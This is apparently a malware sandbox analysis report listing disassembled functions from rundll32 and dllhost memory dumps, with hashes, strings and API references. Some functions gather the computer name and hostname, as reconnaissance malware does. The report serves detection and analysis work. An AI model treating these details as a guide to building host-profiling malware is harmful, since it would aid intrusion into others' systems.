Instruction Fuzzy Hash: 69F01C36904265BBCF121F92CC08F8D3F76EF4A3A1F054110FA1A96120DB328960DBE5

Function 6D01C900 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 215COMMON

Download Yara Rule

Strings

select/poll on SSL socket, errno: %d, xrefs: 6D01CB3A
schannel: timed out sending data (bytes sent: %zd), xrefs: 6D01CB55

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
API String ID: 0-3891197721
Opcode ID: 0d4ff26e5addeba87ff16ec539b2eb183694e22282d7e0a388939124360d68b5
Instruction ID: 78033c2260181309ff478cbc16e2e3eb12551eb5998dc0ade8ae69cc5e91f418
Opcode Fuzzy Hash: 0d4ff26e5addeba87ff16ec539b2eb183694e22282d7e0a388939124360d68b5
Instruction Fuzzy Hash: 89814AB56083419FE704CF68CC80B2ABBE5BF89728F544A2DF56987391D771E904CB92

Function 6D01F340 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

select/poll on SSL/TLS socket, errno: %d, xrefs: 6D01F509
SSL/TLS connection timeout, xrefs: 6D01F524

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
API String ID: 0-3791222319
Opcode ID: cb9e977bf861f0654ff1e0674a4b1f2fd32b612b34fa53dc49c44302a602a576
Instruction ID: f7614948496ae95599cdf9b653b770986927b70adf9528558a9b966041289d2d
Opcode Fuzzy Hash: cb9e977bf861f0654ff1e0674a4b1f2fd32b612b34fa53dc49c44302a602a576
Instruction Fuzzy Hash: EC513A73A0C3015BF310C958BC81B7BBFE8EBC6324F140569EE5997241E725E548C762

Function 6CFF1C20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6CFF1DAF

Part of subcall function 6D04A35E: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,?,?,6CFF5117,?,6D086668,?,?,?,?,?,?), ref: 6D04A38E
Part of subcall function 6D04A35E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,6CFF5117,?,6D086668,?,?,?,?,?,?), ref: 6D04A3BE

Strings

ios_base::failbit set, xrefs: 6CFF1C48
ios_base::badbit set, xrefs: 6CFF1D47, 6CFF1D72, 6CFF1D93

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisableExceptionPrintRaiseScreen@@___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 1900483484-1240500531
Opcode ID: f94d376f9b9061849175b34b5c46d8a97a8134f312962049eb05aa376008dfcb
Instruction ID: 07970daecceb6712e5772ab449493ef7b5e543d0a56faba1d1482d2cea99c2de
Opcode Fuzzy Hash: f94d376f9b9061849175b34b5c46d8a97a8134f312962049eb05aa376008dfcb
Instruction Fuzzy Hash: A451E5B1914204ABDB04CF58C840BAEF7B8EF45314F14C22AF924AB790E731A905CBA1

Function 04EB1510 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04EB1584
std::_Xinvalid_argument.LIBCPMT ref: 04EB159F

Part of subcall function 04EB1740: std::_Xinvalid_argument.LIBCPMT ref: 04EB1758
Part of subcall function 04EB1740: std::_Xinvalid_argument.LIBCPMT ref: 04EB1776
Part of subcall function 04EB1740: std::_Xinvalid_argument.LIBCPMT ref: 04EB1791

Strings

string too long, xrefs: 04EB157F, 04EB159A

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: string too long
API String ID: 909987262-2556327735
Opcode ID: 0df1afea07b5d88e829e05c0c4d81c104534c110a957e47d9efb41d2871ad5f2
Instruction ID: 534e24ab80344e419c76eff6133ea0a396a47a7e2d9864cc82de01e1b16bfa2b
Opcode Fuzzy Hash: 0df1afea07b5d88e829e05c0c4d81c104534c110a957e47d9efb41d2871ad5f2
Instruction Fuzzy Hash: 1431DA727012109BD724CE6CE8A09DBF3E9EF517B47109A2AE1C2C7640D771F84187E4

Function 6D04D096 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 6D04D0BB

Strings

MOC, xrefs: 6D04D0CD
RCC, xrefs: 6D04D0D5

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: b3aebb0fc5845ba83fb9c174b75fb11e8a79f1a5bb787e5cabafc2e9d6cb572a
Instruction ID: eca0da24489544bf6ef3187205068a0b30170c45fd721a1433535f09b56cd21a
Opcode Fuzzy Hash: b3aebb0fc5845ba83fb9c174b75fb11e8a79f1a5bb787e5cabafc2e9d6cb572a
Instruction Fuzzy Hash: C741367290010AFFEF06DF94CD80FAE7BB5AF89304F158169FA1567225D335A950DB60

Function 04ED0BE8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04ED0C22

Part of subcall function 04ED15E1: std::exception::exception.LIBCMT ref: 04ED15F6
Part of subcall function 04ED15E1: __CxxThrowException@8.LIBCMT ref: 04ED160B
Part of subcall function 04ED15E1: std::exception::exception.LIBCMT ref: 04ED161C

Strings

yxxx, xrefs: 04ED0C7C
yxxx, xrefs: 04ED0C33

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: 0ab86c83bd60fbd051862dba59883beed7d65e1a0080c295507c0c0d0550e7cd
Instruction ID: e85897c78fbb614e0299e1c0274d688210ffb82cecabae97557f8b3b79b29033
Opcode Fuzzy Hash: 0ab86c83bd60fbd051862dba59883beed7d65e1a0080c295507c0c0d0550e7cd
Instruction Fuzzy Hash: E121CCB2E002199BD30CDF58CDC1A6EB7E6E784314F25463AFD059B751EA35A941CB90

Function 6D00B6E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D00B76D

Strings

ipv4, xrefs: 6D00B712
ipv6, xrefs: 6D00B71C

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: ipv4$ipv6
API String ID: 885266447-982188191
Opcode ID: 33029e82e7733b691101d3672ee7bb2304b8a3edcccf6674cbe28e267d9ebf70
Instruction ID: 594b51a4f1c1fd83bfbc2af61e8f51dc965c4d65dcfb3492ac9e9f47e8fb36de
Opcode Fuzzy Hash: 33029e82e7733b691101d3672ee7bb2304b8a3edcccf6674cbe28e267d9ebf70
Instruction Fuzzy Hash: EB21D375A09701EBE761CF19C580B4AFBE1BB89751F508A2EE9898B750D370E9418F42

Function 04EB1A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04EB1A3F

Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB2192
Part of subcall function 04EB217D: __CxxThrowException@8.LIBCMT ref: 04EB21A7
Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB21B8

_memmove.LIBCMT ref: 04EB1A75

Strings

invalid string position, xrefs: 04EB1A3A

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: b5f7a4177472af0aca09a0761175e1b03fc903dbb8123b756b858d579aade8e7
Instruction ID: bdc68daf5a24ce90b6348e38fbe94cab6b994c5589b6b4d5d8d47616d66ed957
Opcode Fuzzy Hash: b5f7a4177472af0aca09a0761175e1b03fc903dbb8123b756b858d579aade8e7
Instruction Fuzzy Hash: 51014F313046018BD3258A6CE9A46ABF6E69BC1BA4B246F2CE1D5C7749D6B1FC4287D0

Function 6D036510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

getsockopt.WS2_32(?,0000FFFF,00001001,00004020,?), ref: 6D03657E
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 6D0365A6

Part of subcall function 6D03B400: GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
Part of subcall function 6D03B400: GetProcAddress.KERNEL32(00000000), ref: 6D03B435

Strings

@, xrefs: 6D036518

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProcgetsockoptsetsockopt
String ID: @
API String ID: 1224256098-2726393805
Opcode ID: 1e048b15689617cf6fef84c24a87f44e42e0c96230845d31f72f3834e6f83af9
Instruction ID: 0b0bed8c8eebbd6d67c6367b68d9ce1b97082bde8158cfe09ad9c5ce7485af8a
Opcode Fuzzy Hash: 1e048b15689617cf6fef84c24a87f44e42e0c96230845d31f72f3834e6f83af9
Instruction Fuzzy Hash: 3F0152B1108312ABFB11DF04D945F7A77F8AB42705F814528FA84962D1D3B6C548CB42

Function 04ED0A48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04ED0A76

Part of subcall function 04ED15E1: std::exception::exception.LIBCMT ref: 04ED15F6
Part of subcall function 04ED15E1: __CxxThrowException@8.LIBCMT ref: 04ED160B
Part of subcall function 04ED15E1: std::exception::exception.LIBCMT ref: 04ED161C

Strings

yxxx, xrefs: 04ED0A83
yxxx, xrefs: 04ED0A58

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: 8e5fdac8fe6225b9f8ecff3b9ce797f32ae4c81fd604faebdfb104d94525f03c
Instruction ID: 7a6bbcb3479ba48cfd59d177492074d1f39244a152693e14b28ecade4f2dbd80
Opcode Fuzzy Hash: 8e5fdac8fe6225b9f8ecff3b9ce797f32ae4c81fd604faebdfb104d94525f03c
Instruction Fuzzy Hash: 7EF06262B040364BC71CA53D9C944BE95C687D03987199639E993DFB95E820AC8292C0

Function 04EE1D4D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04EE1832: __getptd.LIBCMT ref: 04EE1838
Part of subcall function 04EE1832: __getptd.LIBCMT ref: 04EE1848

__getptd.LIBCMT ref: 04EE1D5C

Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0

__getptd.LIBCMT ref: 04EE1D6A

Strings

csm, xrefs: 04EE1D78

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 49aad3047015f2739b208b480d3e3ac4fdd781021d16e8741db6a09c693378ed
Instruction ID: ff443744976d6f2e83c5f242927811d1a7e829f56bbfb5f6875a7eb3b00551c2
Opcode Fuzzy Hash: 49aad3047015f2739b208b480d3e3ac4fdd781021d16e8741db6a09c693378ed
Instruction Fuzzy Hash: E201FB39A006058BDF34EF66D4446BDF7F5AF4031AF68A82DD481666A0CB30E9D1DB51

Function 04EC2945 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04EC242A: __getptd.LIBCMT ref: 04EC2430
Part of subcall function 04EC242A: __getptd.LIBCMT ref: 04EC2440

__getptd.LIBCMT ref: 04EC2954

Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848

__getptd.LIBCMT ref: 04EC2962

Strings

csm, xrefs: 04EC2970

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9ff1a4ed38afa8f1ce8c2507374a21226cc69ae74f6227c2680dd2dd3e743e4e
Instruction ID: 3c143dd0e99969c0bdc0dfe32d1bee794a951055b738752ae7fa378499f0a7aa
Opcode Fuzzy Hash: 9ff1a4ed38afa8f1ce8c2507374a21226cc69ae74f6227c2680dd2dd3e743e4e
Instruction Fuzzy Hash: A8016D35C00205CBDF34AF21E6807ADB7B6BF04219F5464ADE58956690CB31A983CB51

Function 04EC3F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28networkCOMMON

Download Yara Rule

APIs

Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB

gethostname.WS2_32(?,00000032), ref: 04EC3FA3
_strncpy.LIBCMT ref: 04EC3FAF

Strings

Remark, xrefs: 04EC3F85

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$ComputerName_strncpygethostnamelstrcpywsprintf
String ID: Remark
API String ID: 3464725772-3865500943
Opcode ID: 449a13732344c0b3e2436ad96d08f262d5f45bddae4af3d2f4777d8cffe03877
Instruction ID: c7044954eb88a8658f4fcfd3a4f972c6c0c9bc331f2db42c8c2326f496381b71
Opcode Fuzzy Hash: 449a13732344c0b3e2436ad96d08f262d5f45bddae4af3d2f4777d8cffe03877
Instruction Fuzzy Hash: 87E07D229441142F9A052B25BC0B8F77B2ECB4322DB0053ECFC4C47201EE033C1742E2

Function 6CFF1240 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFF1245

Part of subcall function 6CFF50F8: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CFF5104

___std_exception_copy.LIBVCRUNTIME ref: 6CFF126E

Strings

string too long, xrefs: 6CFF1240

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: 7fde19f9c502ba7c92373d0b060e582847bfcf2b1220230a6ebf080606fee048
Instruction ID: 47bd6d6159c39829828231a4c3f67507b26e137033e45c9f7fa1b0aefe9d81a5
Opcode Fuzzy Hash: 7fde19f9c502ba7c92373d0b060e582847bfcf2b1220230a6ebf080606fee048
Instruction Fuzzy Hash: C2E0C2729182195BE620DF99DC05E8AB7ACDF15118320C636F658EB641E7B1E48087F5

Function 6D06347D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000FA0,-00000020,6D0638BD,6D0638BD,-00000020,00000FA0,00000000,00000000,00000000,00000000,?), ref: 6D0634AD
InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,6D0638BD,-00000020,00000FA0,00000000,00000000,00000000,00000000,?), ref: 6D0634BD

Strings

InitializeCriticalSectionEx, xrefs: 6D06348D

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CountCriticalDisableInitializePrintScreen@@SectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2586602639-3084827643
Opcode ID: 39f45392322d58e77e223fe468f1fc98ebf32b3629ba5e795d0cee64e6c80bd1
Instruction ID: e6be1cd22b0a5a8e2d0197d6d7c64bcf3036c0a6afbe1dd6bec19e84f2d0613d
Opcode Fuzzy Hash: 39f45392322d58e77e223fe468f1fc98ebf32b3629ba5e795d0cee64e6c80bd1
Instruction Fuzzy Hash: 40E06D35045169B7EF121B91CC08FAE7F25EF09760B04C410FD2D2A152873299209AE1

Function 6D063267 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?), ref: 6D063291
TlsAlloc.KERNEL32 ref: 6D06329B

Strings

FlsAlloc, xrefs: 6D063277

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: AllocDisablePrintScreen@@
String ID: FlsAlloc
API String ID: 2334463026-671089009
Opcode ID: ec7d0f7bc747401a8147f4a337b048bd4595063c6bc01d5410333d52ac84ce9a
Instruction ID: 96331ecfbd7a3cf09aad10406ee99d2c99f748a4ef54fe7df4c0ed7481afa32b
Opcode Fuzzy Hash: ec7d0f7bc747401a8147f4a337b048bd4595063c6bc01d5410333d52ac84ce9a
Instruction Fuzzy Hash: CFE0CD3184417D77AB1127518C08BED3F14EF46770B040120FE1D661C39751450046E6

Function 04EB93D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 04EB93D5

Part of subcall function 04EB47BF: GetLastError.KERNEL32(00000001,00000000,04EB5C91,04EB37E7,00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3), ref: 04EB47C3
Part of subcall function 04EB47BF: ___set_flsgetvalue.LIBCMT ref: 04EB47D1
Part of subcall function 04EB47BF: __calloc_crt.LIBCMT ref: 04EB47E5
Part of subcall function 04EB47BF: DecodePointer.KERNEL32(00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3,00000000,00000000,?,04EB48E3), ref: 04EB47FF
Part of subcall function 04EB47BF: GetCurrentThreadId.KERNEL32 ref: 04EB4815
Part of subcall function 04EB47BF: SetLastError.KERNEL32(00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3,00000000,00000000,?,04EB48E3), ref: 04EB482D

__malloc_crt.LIBCMT ref: 04EB93F7

Part of subcall function 04EB5C8C: __getptd_noexit.LIBCMT ref: 04EB5C8C

Strings

Time, xrefs: 04EB93D4

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: ErrorLast__getptd_noexit$CurrentDecodePointerThread___set_flsgetvalue__calloc_crt__malloc_crt
String ID: Time
API String ID: 2454516118-3483776891
Opcode ID: 918a117a8b7b2d92637de2843c84e9aa9ce79b05ebba547581708cc00deabc7d
Instruction ID: a8a3315e3726131c7a27df8e43064ed8314be14483fbb0e1b52e1322013f3498
Opcode Fuzzy Hash: 918a117a8b7b2d92637de2843c84e9aa9ce79b05ebba547581708cc00deabc7d
Instruction Fuzzy Hash: C3E0C271504F328EE7326B38B4007DB22E08F81B28F022454E6D48B1C1DF70F841C6E0

Analysis Process: dllhost.exePID: 7220, Parent PID: 5632COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	12

Executed Functions

Function 032A4020 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 235
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 032A4064
_strncpy.LIBCMT ref: 032A4081
inet_addr.WS2_32(?), ref: 032A408D

Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB

gethostname.WS2_32(?,00000032), ref: 032A40BC
